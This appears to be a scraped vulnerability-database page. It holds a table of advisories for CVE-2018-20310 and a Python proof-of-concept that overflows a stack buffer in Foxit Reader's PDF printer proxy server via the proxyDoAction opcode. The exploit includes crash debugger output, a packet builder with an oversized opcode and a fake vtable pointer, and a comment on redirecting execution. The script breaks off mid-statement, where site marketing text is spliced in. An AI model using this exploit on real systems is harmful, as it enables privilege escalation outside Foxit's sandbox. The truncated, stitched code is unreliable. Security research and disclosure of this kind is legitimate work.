| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| CVE-2018-20310 | 7 Jan 202116:56 | – | alpinelinux | |
| CVE-2018-20312 | 7 Jan 202117:01 | – | alpinelinux | |
| CVE-2018-20316 | 7 Jan 202117:07 | – | alpinelinux | |
| CVE-2018-20310 | 7 Jan 202120:46 | – | circl | |
| Foxit Reader and PhantomPDF 竞争条件问题漏洞 | 7 Jan 202100:00 | – | cnnvd | |
| Foxit Reader and PhantomPDF Competitive Conditions Vulnerability (CNVD-2021-04398) | 8 Jan 202100:00 | – | cnvd | |
| CVE-2018-20310 | 7 Jan 202116:56 | – | cve | |
| CVE-2018-20310 | 7 Jan 202116:56 | – | cvelist | |
| EUVD-2018-12870 | 7 Oct 202500:30 | – | euvd | |
| Foxit PhantomPDF < 8.3.10 Multiple Vulnerabilities | 30 Apr 201900:00 | – | nessus |
"""
Foxit Reader PDF Printer proxyDoAction opcode Stack Buffer Overflow Elevation of Privilege Vulnerability
Version: 9.3.0.912
SRC: SRC-2019-0025
CVE: CVE-2018-20310
Vendor Advisory: https://www.foxitsoftware.com/support/security-bulletins.php
Details: https://srcincite.io/blog/2019/04/19/its-not-our-sandbox-auditing-foxit-readers-pdf-printer-for-an-eop.html
Summary:
========
The FoxitProxyServer_Socket_RD.exe application contains code that when calling the proxyDoAction function with a large opcode will trigger a stack based buffer overflow. An attacker can possibly leverage this to elevate their privileges under the context of the FoxitProxyServer_Socket_RD.exe server outside of a sandbox.
Debugging:
==========
(2b90.cc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitProxyServer_Socket_RD.exe -
FoxitProxyServer_Socket_RD+0x1e4b5:
00a0e4b5 ff5008 call dword ptr [eax+8] ds:002b:cafebabe=????????
0:000:x86>
"""
import sys
import struct
import socket
def gen_packet():
"""
This method generates the packet structure
"""
# generate buffer
opcode = "\x41" * 0x34
# use this if you wanna write an exploit to pwn var_28 and redirect execution
# this is the fake vtable
opcode += struct.pack("I", 0xcafebabe-0x8)
method = "proxyDoAction"
raw_packet = "foxb" # foxit begin header
raw_packet += "requ" # request header
raw_packet += "\xff\xff\xff\xff" # size of the packet including the header (patched in later)
raw_packet += struct.pack("I", len(method)) # length of method
raw_packet += method # method
raw_packet += struct.pack("Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation